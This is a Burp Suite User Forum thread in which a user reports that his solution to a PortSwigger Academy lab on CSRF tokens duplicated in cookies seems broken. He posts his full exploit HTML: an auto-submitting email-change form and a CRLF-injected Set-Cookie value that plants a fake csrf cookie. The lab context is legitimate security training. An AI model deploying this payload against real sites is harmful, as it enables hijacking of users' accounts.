Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab Solution not working

Dominik | Last updated: Oct 19, 2022 02:57PM UTC

Hi! I'm currently doing the burp academy and therefore a lot of labs. I'm trying to do the CSRF Duplicated in Cookie-Lab and it seems to be bugged? I tried it on my own and with the solution, when I test it the email gets changed and it works well. But if I send it to the victim, the lab doesn't get solved. Is there a known problem or am I doing something wrong? I followed the steps from the solution and from a video tutorial (where it worked) exactly. A colleague of mine also looked into it and didn't find a problem with my solution. Link to the lab: https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie My solution (csrf html): <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://ID.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="anything%40web-security-academy.net" /> <input type="hidden" name="csrf" value="fake" /> <input type="submit" value="Submit request" /> </form> <img src="https://ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html> I also tried a real csrf token (regarding the size and copied one) just in case the "fake" doesn't work (even though its in the solution). Thanks for your help!

Michelle, PortSwigger Agent | Last updated: Oct 19, 2022 04:28PM UTC